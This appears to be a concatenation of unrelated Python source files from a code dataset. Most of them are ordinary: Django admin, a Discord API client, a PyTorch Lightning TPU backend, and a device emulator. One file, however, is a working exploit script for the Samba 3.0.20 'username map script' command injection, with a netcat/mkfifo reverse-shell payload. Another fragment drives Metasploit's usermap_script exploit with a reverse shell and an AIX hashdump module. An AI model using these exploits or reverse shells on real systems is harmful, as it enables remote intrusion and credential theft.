print((""+G+"Thanks for using PTF"))
print()
exit()
elif map == 'back':
core.menu.postex()
elif map =='set target':
rhost =eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/samba "+G+"(set RHOST)"+N+"): "))
print(("RHOST =>",rhost))
rport =eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/samba "+G+"(set RPORT)"+N+"): "))
print(("RPORT =>",rport))
lhost =eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/samba "+G+"(set LHOST)"+N+"): "))
print(('LHOST =>',lhost))
lport =eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/samba "+G+"(set LPORT)"+N+"): "))
print(('LPORT =>',lport))
her =eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/samba "+N+"): "))
if her =='run':
os.system('msfconsole -q -x "use exploit/multi/samba/usermap_script; set RHOST %s ; set RPORT %s ; set payload cmd/unix/reverse ; set LHOST %s ; set LPORT %s ; run "' % (rhost, rport, lhost, lport))
print()
smb()
elif map =='clear':
clean()
smb()
else:
print(("Wrong Command => ", map))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
smb()
def aix_hashdump():
while True:
cs = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/aix_hashdump "+N+"): "))
if cs == 'show options':
help.option()
aix_hashdump()
elif cs == 'set target':
os.system('msfconsole -q -x "use use post/aix/hashdump; show options" ')
print()
aix_hashdump()
elif cs =='back':
core.menu.post()
elif cs =='clear':
clean()
aix_hashdump()
elif cs =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
else:
print(("Wrong Command => ", cs))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
aix_hashdump()
pass
| StarcoderdataPython |
110239 | <gh_stars>1-10
#!/usr/bin/env python
from application import router
if __name__ == '__main__':
router.app.run(host="0.0.0.0", port=8000, debug=True)
| StarcoderdataPython |
1679221 | <reponame>vanminhdev/kcsg
from queue import Queue
from threading import Timer
class ScanningMonitor:
scanning_interval = 5
local_interval = 5
changed_quantity = {
'old': 0,
'now': 0
}
max_size_queue = 3
last_times_v = Queue(max_size_queue)
@staticmethod
def check_changed_items():
now = ScanningMonitor.changed_quantity['now']
old = ScanningMonitor.changed_quantity['old']
ScanningMonitor.changed_quantity['now'] = 0
ScanningMonitor.changed_quantity['old'] = now
f1 = now
f2 = old
v = 0 if f1 == 0 and f2 == 0 else abs(f1 - f2) / (f1 + f2)
print('f1, f2, v: ' + str(f1) + ' ' + str(f2) + ' ' + str(v))
if ScanningMonitor.last_times_v.full():
ScanningMonitor.last_times_v.get()
ScanningMonitor.last_times_v.put(v)
print(list(ScanningMonitor.last_times_v.queue))
print('Queue: ')
print(list(ScanningMonitor.last_times_v.queue))
list_v = list(ScanningMonitor.last_times_v.queue)
pivot = sum(list_v) / ScanningMonitor.max_size_queue
ScanningMonitor.update_scanning_interval(pivot)
@staticmethod
def update_scanning_interval(pivot):
if pivot > 0.6:
ScanningMonitor.scanning_interval = 3
elif pivot < 0.4:
ScanningMonitor.scanning_interval = 10
elif 0.4 <= pivot <= 0.6:
ScanningMonitor.scanning_interval = 5
print('interval: ' + str(ScanningMonitor.scanning_interval))
@staticmethod
def start():
print('CHECKING CHANGED ITEMS...')
ScanningMonitor.check_changed_items()
Timer(ScanningMonitor.local_interval, ScanningMonitor.start).start()
| StarcoderdataPython |
3306128 | <reponame>ISISComputingGroup/EPICS-DeviceEmulator
from collections import OrderedDict
from .states import DefaultState
from lewis.devices import StateMachineDevice
from random import random as rnd
class SimulatedTtiplp(StateMachineDevice):
def _initialize_data(self):
"""
Initialize all of the device's attributes.
"""
self.ident = "<NAME>, PL303-P, 490296, 3.02-4.06"
self.volt = 0
self.volt_sp = 0
self.curr = 0
self.curr_sp = 0
self.output = 0
self.overvolt = 0
self.overcurr = 0
def reset(self):
self._initialize_data()
def _get_state_handlers(self):
return {
'default': DefaultState(),
}
def _get_initial_state(self):
return 'default'
def _get_transition_handlers(self):
return OrderedDict([
])
def get_volt(self):
if self.output == 1:
self.volt = self.volt_sp + ((rnd()-0.5)/1000)
else:
self.volt = ((rnd()-0.5)/1000)
return self.volt
def get_curr(self):
if self.output == 1:
self.curr = self.curr_sp+((rnd()-0.5)/1000)
else:
self.curr = ((rnd()-0.5)/1000)
return self.curr
def set_volt_sp(self, volt_sp):
self.volt_sp = float(volt_sp)
if float(volt_sp) > float(self.overvolt):
self.output = 0
self.volt = 0
self.curr = 0
def set_curr_sp(self, curr_sp):
self.curr_sp = float(curr_sp)
if float(curr_sp) > float(self.overcurr):
self.output = 0
self.volt = 0
self.current = 0
def set_overvolt(self,overvolt):
self.overvolt = float(overvolt)
if float(overvolt) < self.volt_sp:
self.volt = 0
self.curr = 0
self.output = 0
def set_overcurr(self,overcurr):
self.overcurr = float(overcurr)
if float(overcurr) < self.curr_sp:
self.volt = 0
self.curr = 0
self.output = 0
def set_output(self,output):
if (self.volt_sp <= self.overvolt) and (self.curr_sp <= self.overcurr) and int(output) == 1:
self.output = 1
else:
self.output = 0
| StarcoderdataPython |
165132 | # coding: utf-8
from django.contrib import admin
from django.utils.safestring import SafeString as _S
from django.utils.html import format_html
from ordered_model.admin import OrderedModelAdmin
from ordered_model.admin import OrderedTabularInline
from mptt.admin import MPTTModelAdmin
from mptt.forms import TreeNodeChoiceField
from . import models, forms
class ThumbnailAdminInline(admin.TabularInline):
model = models.Thumbnail
def image_tag(self, obj):
if obj.data:
return format_html('<img src="{}" width="100px"/>'.format(
obj.data.url))
image_tag.short_description = 'Image'
extra = 1
readonly_fields = ['image_tag', ]
@admin.register(models.MediaFile)
class MediaFileAdmin(admin.ModelAdmin):
def image_tag(self, obj):
if hasattr(obj, 'imagemeta'):
return format_html('<img src="{}" width="100px"/>'.format(
obj.data.url))
image_tag.short_description = 'Image'
list_display = ['id', 'image_tag', 'data', 'access', 'owner', 'media_type', ]
inlines = [ThumbnailAdminInline]
readonly_fields = ['image_tag', ]
@admin.register(models.ImageMeta)
class ImageMetaAdmin(admin.ModelAdmin):
list_display = ['id', 'width', 'height', 'info', ]
raw_id_fields = ['image', ]
@admin.register(models.ThumbnailProfile)
class ThumbnailProfileAdmin(OrderedModelAdmin):
list_display = ['id', 'order', 'name', 'width', 'height', 'info', 'move_up_down_links', ]
@admin.register(models.Thumbnail)
class ThumbnailAdmin(admin.ModelAdmin):
list_display = ['id', 'image', 'data', ]
raw_id_fields = ['image', ]
@admin.register(models.Path)
class PathAdmin(MPTTModelAdmin):
pass
@admin.register(models.StaticFile)
class StaticFileAdmin(admin.ModelAdmin):
form = forms.StaticFileForm
list_display = ['id', 'full_path', 'basename', ]
readonly_fields = ['full_path', 'link', ]
def link(self, obj):
return _S('<a href="{u}">{u}</a>'.format(u=obj.url))
class AlbumFileAdminInline(OrderedTabularInline):
def image_tag(self, obj):
if obj.mediafile and hasattr(obj.mediafile, 'imagemeta'):
return format_html('<img src="{}" width="100px"/>'.format(
obj.mediafile.data.url))
image_tag.short_description = 'Image'
model = models.AlbumFile
extra = 1
raw_id_fields = ['mediafile', ]
readonly_fields = ['image_tag', 'order', 'move_up_down_links', ]
@admin.register(models.Album)
class AlbumAdmin(admin.ModelAdmin):
inlines = [AlbumFileAdminInline, ]
list_display = ['id', 'owner', 'title', ]
raw_id_fields = ['owner', ]
def get_urls(self):
urls = super(AlbumAdmin, self).get_urls()
for inline in self.inlines:
if hasattr(inline, 'get_urls'):
urls = inline.get_urls(self) + urls
return urls
| StarcoderdataPython |
1746533 | from typing import TYPE_CHECKING, Any
from dis_snek.const import MISSING, Absent
from dis_snek.models.route import Route
from dis_snek.utils.serializer import dict_filter_missing
if TYPE_CHECKING:
from dis_snek.models.snowflake import Snowflake_Type
class ReactionRequests:
request: Any
async def create_reaction(self, channel_id: "Snowflake_Type", message_id: "Snowflake_Type", emoji: str) -> None:
"""
Create a reaction for a message.
parameters:
channel_id: The channel this is taking place in
message_id: The message to create a a reaction on
emoji: The emoji to use (format: `name:id`)
"""
return await self.request(
Route(
"PUT",
"/channels/{channel_id}/messages/{message_id}/reactions/{emoji}/@me",
channel_id=channel_id,
message_id=message_id,
emoji=emoji,
)
)
async def remove_self_reaction(
self, channel_id: "Snowflake_Type", message_id: "Snowflake_Type", emoji: str
) -> None:
"""
Remove client's reaction from a message
parameters:
channel_id: The channel this is taking place in.
message_id: The message to remove the reaction on.
emoji: The emoji to remove. (format: `name:id`)
"""
return await self.request(
Route(
"DELETE",
"/channels/{channel_id}/messages/{message_id}/reactions/{emoji}/@me",
channel_id=channel_id,
message_id=message_id,
emoji=emoji,
)
)
async def remove_user_reaction(
self, channel_id: "Snowflake_Type", message_id: "Snowflake_Type", emoji: str, user_id: "Snowflake_Type"
) -> None:
"""
Remove user's reaction from a message
parameters:
channel_id: The channel this is taking place in
message_id: The message to remove the reaction on.
emoji: The emoji to remove. (format: `name:id`)
user_id: The user to remove reaction of.
"""
return await self.request(
Route(
"DELETE",
"/channels/{channel_id}/messages/{message_id}/reactions/{emoji}/{user_id}",
channel_id=channel_id,
message_id=message_id,
emoji=emoji,
user_id=user_id,
)
)
async def clear_reaction(self, channel_id: "Snowflake_Type", message_id: "Snowflake_Type", emoji: str) -> None:
"""
Remove specific reaction from a message
parameters:
channel_id: The channel this is taking place in.
message_id: The message to remove the reaction on.
emoji: The emoji to remove. (format: `name:id`)
"""
return await self.request(
Route(
"DELETE",
"/channels/{channel_id}/messages/{message_id}/reactions/{emoji}",
channel_id=channel_id,
message_id=message_id,
emoji=emoji,
)
)
async def clear_reactions(self, channel_id: "Snowflake_Type", message_id: "Snowflake_Type") -> None:
"""
Remove reactions from a message.
parameters:
channel_id: The channel this is taking place in.
message_id: The message to clear reactions from.
"""
return await self.request(Route("DELETE", f"/channels/{channel_id}/messages/{message_id}/reactions"))
async def get_reactions(
self,
channel_id: "Snowflake_Type",
message_id: "Snowflake_Type",
emoji: str,
limit: Absent[int] = MISSING,
after: "Snowflake_Type" = MISSING,
) -> list:
"""
Gets specific reaction from a message
parameters:
channel_id: The channel this is taking place in.
message_id: The message to get the reaction.
emoji: The emoji to get. (format: `name:id`)
"""
return await self.request(
Route(
"GET",
"/channels/{channel_id}/messages/{message_id}/reactions/{emoji}",
channel_id=channel_id,
message_id=message_id,
emoji=emoji,
),
params=dict_filter_missing(dict(limit=limit, after=after)),
)
| StarcoderdataPython |
1634944 | <reponame>Fireman730/python-eveng-api
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Description ...
"""
__author__ = "<NAME>"
__maintainer__ = "<NAME>"
__version__ = "1.0"
__email__ = "<EMAIL>"
__status__ = "Production"
__copyright__ = "Copyright 2019"
__license__ = "MIT"
######################################################
#
# Default value used for exit()
#
EXIT_SUCCESS = 0
EXIT_FAILURE = 1
######################################################
#
# Import Library
#
######################################################
#
# Import Library
#
try:
from os import listdir
from os.path import isfile, join
except ImportError as importError:
print("Error import listdir")
print(importError)
exit(EXIT_FAILURE)
try:
import yaml
except ImportError as importError:
print("Error import yaml")
print(importError)
exit(EXIT_FAILURE)
try:
import paramiko
except ImportError as importError:
print("Error import paramiko")
print(importError)
exit(EXIT_FAILURE)
try:
import devices.abstract_device
except ImportError as importError:
print("Error import abc - Cumulus abstractmethod")
print(importError)
exit(EXIT_FAILURE)
try:
from exceptions.EveExceptions import EVENG_Exception
except ImportError as importError:
print("Error import listdir")
print(importError)
exit(EXIT_FAILURE)
######################################################
#
# Constantes
#
######################################################
#
# Class
#
class JuniperDevice(devices.abstract_device.DeviceQEMUAbstract):
raise NotImplementedError
| StarcoderdataPython |
67087 | <filename>openproblems/api/load.py
from . import utils
def load_dataset(task_name, function_name, test):
"""Load a dataset for a task."""
fun = utils.get_function(task_name, "datasets", function_name)
return fun(test=test)
def main(args):
"""Run the ``load`` subcommand."""
adata = load_dataset(args.task, args.name, args.test)
adata.write_h5ad(args.output)
| StarcoderdataPython |
3210645 | <reponame>stas00/pytorch-lightning
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from pytorch_lightning.utilities import rank_zero_info, rank_zero_only, rank_zero_warn
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning import _logger as log
try:
import torch_xla
import torch_xla.core.xla_model as xm
import torch_xla.distributed.xla_multiprocessing as xmp
except ImportError:
XLA_AVAILABLE = False
else:
XLA_AVAILABLE = True
class TPUBackend(object):
def __init__(self, trainer):
self.trainer = trainer
self.start_method = None
def setup(self):
rank_zero_info(f'training on {self.trainer.tpu_cores} TPU cores')
if not XLA_AVAILABLE:
raise MisconfigurationException('No TPU devices found.')
# COLAB_GPU is an env var available by default in Colab environments.
self.start_method = 'fork' if self.trainer.on_colab_kaggle else 'spawn'
def teardown(self):
# when training completes, load the weights back in main process
self.__load_weights_on_main_process()
def train(self, model):
self.trainer.model = model
# train
if self.trainer.tpu_id is not None:
self.tpu_train_in_process(self.trainer.tpu_id, model)
else:
xmp.spawn(
self.tpu_train_in_process,
args=(model,),
nprocs=self.trainer.tpu_cores,
start_method=self.start_method
)
def __load_weights_on_main_process(self):
model = self.trainer.model
# load weights if not interrupted
if self.trainer.on_colab_kaggle and not self.trainer.testing:
self.trainer.load_spawn_weights(model)
self.trainer.model = model
def tpu_train_in_process(self, tpu_core_idx, model):
"""
Here we are inside each individual process
"""
if not self.trainer.testing:
self.trainer.setup('fit')
model.setup('fit')
# setup TPU training
self.__setup_tpu_training(model)
# Run the pretrain routine
self.trainer.run_pretrain_routine(model)
# save weights at the end of training
self.__save_end_of_training_weights(model)
def __save_end_of_training_weights(self, model):
# when training ends on these platforms dump weights to get out of the main process
if self.trainer.on_colab_kaggle:
rank_zero_warn('cleaning up... please do not interrupt')
self.trainer.save_spawn_weights(model)
def __setup_tpu_training(self, model):
# use the default device from the process
tpu_device = xm.xla_device()
# if given an ordinal device, use this as the device
if self.trainer.tpu_id is not None:
tpu_device = xm.xla_device(self.trainer.tpu_id)
# track the device and move model to it
self.trainer._device = tpu_device
model.to(self.trainer._device)
# get the appropriate tpu ranks
self.trainer.tpu_local_core_rank = xm.get_local_ordinal()
self.trainer.tpu_global_core_rank = xm.get_ordinal()
# avoid duplicating progress bar
if self.trainer.tpu_global_core_rank != 0 and self.trainer.progress_bar_callback is not None:
self.trainer.progress_bar_callback.disable()
self.trainer.global_rank = self.trainer.tpu_local_core_rank
rank_zero_only.rank = self.trainer.global_rank
# CHOOSE OPTIMIZER
# allow for lr schedulers as well
optimizers, lr_schedulers, optimizer_frequencies = self.trainer.init_optimizers(model)
self.trainer.optimizers = optimizers
self.trainer.lr_schedulers = lr_schedulers
self.trainer.optimizer_frequencies = optimizer_frequencies
# init 16 bit for TPU
if self.trainer.precision == 16:
os.environ['XLA_USE_BF16'] = str(1)
log.info(f'INIT TPU local core: {self.trainer.tpu_local_core_rank},'
f' global rank: {self.trainer.tpu_global_core_rank}')
| StarcoderdataPython |
3395089 | <gh_stars>0
#!/usr/bin/env python3
def print_hello():
print("Hello!")
| StarcoderdataPython |
188742 | import json
import mimetypes
import os
from aws_xray_sdk.core import patch
import boto3
from boto3.dynamodb.conditions import Key
from botocore.client import Config
patch(["boto3"])
TABLE_NAME = os.getenv('TABLE_NAME')
NOT_FOUND = {
"isBase64Encoded": False,
"statusCode": 404,
"body": json.dumps({'message': "Not Found"}),
"headers": {
"Content-Type": "application/json"
},
}
session = boto3.Session()
dynamodb = session.resource('dynamodb').Table(TABLE_NAME)
def lambda_handler(event, context):
client_token_claims = event['requestContext']['authorizer']['claims']
sha = event['pathParameters']['sha']
try:
size = event['queryStringParameters']['size']
except:
size = 0
link_response = dynamodb.query(
Select='COUNT',
KeyConditionExpression=
Key('pk').eq(client_token_claims['client_id']) & Key('sk').begins_with(sha)
)
if link_response['Count'] == 0:
return NOT_FOUND
image_response = dynamodb.get_item(Key={'pk': 'IMAGE', 'sk': sha})
extension = mimetypes.guess_extension(image_response['Item']['mimetype'])
key_path = os.path.join('images', sha, f"{size}{extension}")
s3_client = session.client(
's3',
region_name=image_response['Item']['origin_region'],
config=Config(signature_version='s3v4')
)
try:
s3_client.head_object(Bucket=image_response['Item']['origin_bucket'], Key=key_path)
except:
return NOT_FOUND
presigned_url = s3_client.generate_presigned_url(
ClientMethod='get_object',
Params={
'Bucket': image_response['Item']['origin_bucket'],
'Key': key_path
},
ExpiresIn=60
)
return {
"isBase64Encoded": False,
"statusCode": 200,
"body": json.dumps(
{
"message": "Success!",
"path": event['path'],
"method": event['httpMethod'],
"token_claims": event['requestContext']['authorizer']['claims'],
"download_url": presigned_url
}
),
"headers": {
"Content-Type": "application/json"
},
}
| StarcoderdataPython |
102330 | l, r = map(int, input().split())
mod = 10 ** 9 + 7
def f(x):
if x == 0:
return 0
res = 1
cnt = 2
f = 1
b_s = 2
e_s = 4
b_f = 3
e_f = 9
x -= 1
while x > 0:
if f:
res += cnt * (b_s + e_s) // 2
b_s = e_s + 2
e_s = e_s + 2 * (4 * cnt)
else:
res += cnt * (b_f + e_f) // 2
b_f = e_f + 2
e_f = e_f + 2 * (4 * cnt)
x -= cnt
if x < 0:
if f:
b_s -= 2
res -= abs(x) * (b_s + b_s - abs(x + 1) * 2) // 2
else:
b_f -= 2
res -= abs(x) * (b_f + b_f - abs(x + 1) * 2) // 2
cnt *= 2
f = 1 - f
return res
print((f(r) - f(l - 1)) % mod)
| StarcoderdataPython |
3246984 | <filename>test/core/plugins/__init__.py
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# author: <EMAIL>
# datetime: 2021/10/22 下午2:56
# project: DongTai-engine
| StarcoderdataPython |
3328712 | <gh_stars>1-10
#!/usr/bin/python2
#-*- coding:utf-8 -*-
#Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution
import os
import time
import socket
import platform
import sys
import threading
try:
from datetime import datetime
except ImportError:
print("[*] Module Datetime Not Found !")
try:
from smb.SMBConnection import SMBConnection
except ImportError:
print("[*] Module SMB Not Found !")
try:
import nclib
except ImportError:
print("[*] Module NCLIB Not Found !")
banner = '''
\033[32m
_______ _______ ______ _ _ _______ _______ _____
|______ | | | |_____] | | | | | |_____| |_____]
______| | | | |_____] |_____| | | | | | |
User Map Script Remote Command Injection
Created By Unam3dd
Github : \033[31mUnam3dd\033[32m
Instagram : \033[31munam3dd
\033[00m
'''
PAYLOAD_REVERSE_SHELL = "mkfifo /tmp/ffuw; nc 192.168.1.71 4444 0</tmp/ffuw | /bin/sh >/tmp/ffuw 2>&1; rm /tmp/ffuw"
def platform_required():
if 'Linux' not in platform.platform():
sys.exit("[*] Linux Required !")
def py_version_required():
if sys.version[0] =="3":
sys.exit("[*] Please Use Python2.7 For This Script !")
def check_port(ip,port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip,int(port)))
return True
except:
return False
def sending_exploit(ip,port,command):
userid = "/=`nohup " +command.encode("utf-8") + "`"
password = "<PASSWORD>"
try:
conn = SMBConnection(userid,password,"<PASSWORD>","WORLD", use_ntlm_v2 = False)
conn.connect(ip,int(port))
return True
except:
return False
if __name__ == '__main__':
platform_required()
py_version_required()
if len(sys.argv) <3:
print(banner)
print("usage : %s cmd <rhost> <rport> <payload_command>" % (sys.argv[0]))
print(" %s reverse_shell <rhost> <rport> <lhost> <lport>" % (sys.argv[0]))
else:
print(banner)
if sys.argv[1] =="cmd":
if check_port(sys.argv[2],sys.argv[3]) ==True:
print("\033[32m[\033[34m+\033[32m] SMB Service Found !")
print("\033[32m[\033[34m+\033[32m] Payload Injected !")
sending_exploit(sys.argv[2],sys.argv[3],sys.argv[4])
else:
print("\033[32m[\033[31m-\033[32m] SMB Service Not Found !")
elif sys.argv[1] =="reverse_shell":
if check_port(sys.argv[2],sys.argv[3]) ==True:
print("\033[32m[\033[34m+\033[32m] SMB Service Found !")
print("\033[32m[\033[34m+\033[32m] Reverse Shell Injected Reversed On => %s:%s " % (sys.argv[4],sys.argv[5]))
reverse_shell = PAYLOAD_REVERSE_SHELL
reverse_shell = reverse_shell.replace("192.168.1.71",sys.argv[4])
reverse_shell = reverse_shell.replace("4444",sys.argv[5])
sending_exploit(sys.argv[2],sys.argv[3],reverse_shell)
else:
print("\033[32m[\033[31m-\033[32m] SMB Service Not Found !") | StarcoderdataPython |
3394094 | <reponame>njoanc/Instagram
from django.db import models
from django.contrib.auth.models import User
import datetime as dt
from django.db.models.signals import post_save
from django.dispatch import receiver
from tinymce.models import HTMLField
class Profile(models.Model):
user = models.OneToOneField(User,on_delete=models.CASCADE, null=True)
first_name = models.CharField(max_length=30, null=True)
last_name = models.CharField(max_length=30, null=True)
bio = models.CharField(max_length=350, null=True)
profile_pic = models.ImageField(upload_to='ProfilePicture/', null=True)
# profile_avatar = models.ImageField(upload_to='AvatorPicture/', null=True)
date = models.DateTimeField(auto_now_add=True, null= True)
birth_date = models.DateField(null=True)
email = models.EmailField(max_length=150, null=True)
password = models.CharField(max_length=150, null=True)
@receiver(post_save, sender=User)
def update_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
instance.profile.save()
def save_profile(self):
self.save()
@classmethod
def get_by_id(cls, id):
details = Profile.objects.get(user = id)
return details
@classmethod
def filter_by_id(cls, id):
details = Profile.objects.filter(user = id).first()
return details
@classmethod
def search_user(cls, name):
userprof = User.objects.filter(username__icontains = name)
return userprof
class Comments (models.Model):
comment_post = models.CharField(max_length=150, null=True)
author = models.ForeignKey('Profile',related_name='comment' , on_delete=models.CASCADE)
commented_image = models.ForeignKey('Image', on_delete=models.CASCADE)
date = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.name
class Meta:
ordering = ['comment_post', 'author','commented_image']
def save_comment(self):
self.save()
def delete_comment(self):
self.delete()
@classmethod
def find_commentimage(cls,id):
comments = Comments.objects.filter(image__pk = id)
return comments
class Image(models.Model):
image = models.ImageField(upload_to ='pictsagram/',null=True)
image_caption = models.CharField(max_length=700, null=True)
tag_someone = models.CharField(max_length=50,blank=True, null=True)
profile = models.ForeignKey(Profile, null = True,on_delete=models.CASCADE,related_name='image')
image.user = models.ForeignKey(User, on_delete=models.CASCADE, blank=True, null=True)
image_likes = models.ManyToManyField('Profile', default=False, blank=True,related_name='likes')
date = models.DateTimeField(auto_now_add=True, null= True)
# comment = models.ForeignKey
user= models.ForeignKey(User, null=True, blank=True, on_delete=models.CASCADE)
def save_image(self):
self.save()
@classmethod
def get_by_id(cls,id):
image= Image.objects.get(user = id)
return image
@classmethod
def get_images(cls, profile):
image = Image.objects.filter(Profile__pk = profile)
return image
@classmethod
def get_all_images(cls):
images = Image.objects.all()
return images
@classmethod
def get_profile_images(cls, profile):
images = Image.objects.filter(profile__pk = profile)
return images
@classmethod
def find_image_id(cls, id):
identity = Image.objects.get(pk=id)
return identity
class Follow(models.Model):
user = models.ForeignKey(Profile,on_delete=models.CASCADE,null=True)
follower = models.ForeignKey(User,on_delete=models.CASCADE,null=True)
def __int__(self):
return self.name
def save_follower(self):
self.save()
def delete_follower(self):
self.save()
class Unfollow(models.Model):
user = models.ForeignKey(Profile,on_delete=models.CASCADE,null=True)
follower = models.ForeignKey(User,on_delete=models.CASCADE,null=True)
def __int__(self):
return self.name
def save_unfollower(self):
self.save()
def delete_unfollower(self):
self.save()
| StarcoderdataPython |
168036 | <reponame>jaredhoberock/cuda_graphs_executor_prototypes
#!/usr/bin/env python3
import sys
import os
import subprocess
import numpy
endpoints = numpy.logspace(3, 8.66, 10)
sizes = []
start = 1
for end in endpoints:
points = numpy.linspace(start, end, 10, endpoint = False)
sizes.extend([int(pt) for pt in points])
start = end
sizes.append(int(start))
program_name = os.path.abspath(sys.argv[1])
print("size,bandwidth")
for size in sizes:
output = subprocess.run([program_name, str(size)], stdout = subprocess.PIPE, stderr = subprocess.PIPE).stderr
print(output.decode(), end = '')
| StarcoderdataPython |
3245312 | class Solution:
def minimumDistance(self, word: str) -> int:
keyboard = [None] * 256
ncols = 6
word = [ord(ch) for ch in word]
for ch in string.ascii_uppercase:
idx = ord(ch) - ord('A')
r, c = idx // ncols, idx % ncols
keyboard[ord(ch)] = (r, c)
def dist(ch1, ch2):
r1, c1 = keyboard[ch1]
r2, c2 = keyboard[ch2]
return abs(r1 - r2) + abs(c1 - c2)
memo = {}
def dfs(cur, f1, f2):
if cur == len(word):
return 0
if (cur, f1, f2) in memo:
return memo[cur, f1, f2]
else:
ch = word[cur]
ans = min(dist(ch, f1) + dfs(cur + 1, ch, f2), dist(ch, f2) + dfs(cur + 1, f1, ch))
memo[cur, f1, f2] = ans
return ans
mn = math.inf
for c1 in string.ascii_uppercase:
for c2 in string.ascii_uppercase:
f1, f2 = ord(c1), ord(c2)
mn = min(mn, dfs(0, f1, f2))
return mn
| StarcoderdataPython |
3333956 | #######################################################
#
# Teams.py
# Python implementation of the Enumeration Teams
# Generated by Enterprise Architect
# Created on: 04-Nov-2020 4:43:17 PM
# Original author: natha
#
#######################################################
class Teams:
# default constructor def __init__(self):
# default constructor def __init__(self):
Yellow = ""
Red = ""
Green = ""
Blue = ""
| StarcoderdataPython |
53596 | import re
from arqtty_scrapper.page_types import Page_types
class Classifier:
def __init__(self, page_str):
self.page = page_str
def _is_404(self):
marker1 = 'Ой, ой, страничка потерялась'
marker2 = 'Спокойно! Логи записаны. Все будет исправлено.'
return re.search(marker1, self.page) and re.search(marker2, self.page)
def _is_user_blocked(self):
marker1 = "Пользователь '[\w\W]*' заблокирован"
return re.search(marker1, self.page)
def _is_alive(self):
marker1 = 'Лента действий'
return re.search(marker1, self.page)
def get_type(self):
if self._is_404():
return Page_types.E_404
elif self._is_user_blocked():
return Page_types.USER_BANNED
elif self._is_alive():
return Page_types.CORRECT
else:
return Page_types.UNDEFINED
| StarcoderdataPython |
1688374 | <filename>edge_tpu/video_object_detection.py<gh_stars>0
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""A demo for object detection.
For Raspberry Pi, you need to install 'feh' as image viewer:
sudo apt-get install feh
Example (Running under edgetpu repo's root directory):
- Face detection:
python3 examples/object_detection.py \
--model='test_data/mobilenet_ssd_v2_face_quant_postprocess_edgetpu.tflite' \
--keep_aspect_ratio
- Pet detection:
python3 examples/object_detection.py \
--model='test_data/ssd_mobilenet_v1_fine_tuned_edgetpu.tflite' \
--label='test_data/pet_labels.txt' \
--keep_aspect_ratio
"""
import argparse
import platform
import subprocess
from edgetpu.detection.engine import DetectionEngine
from edgetpu.utils import dataset_utils
from PIL import Image
from PIL import ImageDraw
import glob
import time
import cv2
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'--model',
help='Path of the detection model, it must be a SSD model with postprocessing operator.',
required=True)
parser.add_argument('--label', help='Path of the labels file.')
parser.add_argument(
'--keep_aspect_ratio',
dest='keep_aspect_ratio',
action='store_true',
help=(
'keep the image aspect ratio when down-sampling the image by adding '
'black pixel padding (zeros) on bottom or right. '
'By default the image is resized and reshaped without cropping. This '
'option should be the same as what is applied on input images during '
'model training. Otherwise the accuracy may be affected and the '
'bounding box of detection result may be stretched.'))
parser.set_defaults(keep_aspect_ratio=False)
args = parser.parse_args()
# Initialize engine.
engine = DetectionEngine(args.model)
labels = dataset_utils.read_label_file(args.label) if args.label else None
cap = cv2.VideoCapture('fast_forward.mp4')
total_time = 0
load_time = 0
preproc_time = 0
infer_time = 0
postproc_time = 0
image_count = 0
for i in range(10):
while image_count < 10000:
# Open image.
start_time = time.time()
ret, img = cap.read()
load_time += time.time() - start_time
temp_time = time.time()
img = Image.fromarray(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
im_width, im_height = img.size
img_resized = img.resize((300,300))
preproc_time += time.time() - temp_time
# Run inference.
temp_time = time.time()
ans = engine.detect_with_image(
img_resized,
threshold=0.5,
keep_aspect_ratio=args.keep_aspect_ratio,
relative_coord=False,
top_k=15)
infer_time += time.time() - temp_time
temp_time = time.time()
draw = ImageDraw.Draw(img)
# Display result.
if ans:
for obj in ans:
box = obj.bounding_box.flatten().tolist()
# Draw a rectangle.
draw.rectangle([box[0]* im_width / 300, box[1]* im_height /300, box[2]* im_width /300, box[3] * im_height / 300], outline='red')
#img.save('output/' + file_name[file_name.rfind('/'):])
postproc_time += time.time() - temp_time
total_time += time.time() - start_time
image_count += 1
if image_count % 50 == 0:
print('num of inferred images: ', image_count)
print('total images used for benchmark: ' + str(image_count))
print('total time (s): ' + str(total_time))
print('total load time (s): ' + str(load_time))
print('total preprocess time (s): ' + str(preproc_time))
print('total inference time (s): ' + str(infer_time) )
print('total postrocess time (s): ' + str(postproc_time))
print('average total time (s): ' + str(total_time / image_count))
print('average load time (s): ' + str(load_time / image_count))
print('average preprocess time (s): ' + str(preproc_time / image_count))
print('average inference time (s): ' + str(infer_time / image_count))
print('average postrocess time (s): ' + str(postproc_time / image_count))
if __name__ == '__main__':
main()
| StarcoderdataPython |
15437 | # -*- coding: utf-8 -*-
"""
Created on Fri Aug 9 15:33:47 2019
@author: Bogoclu
"""
import typing
import multiprocessing as mp
import warnings
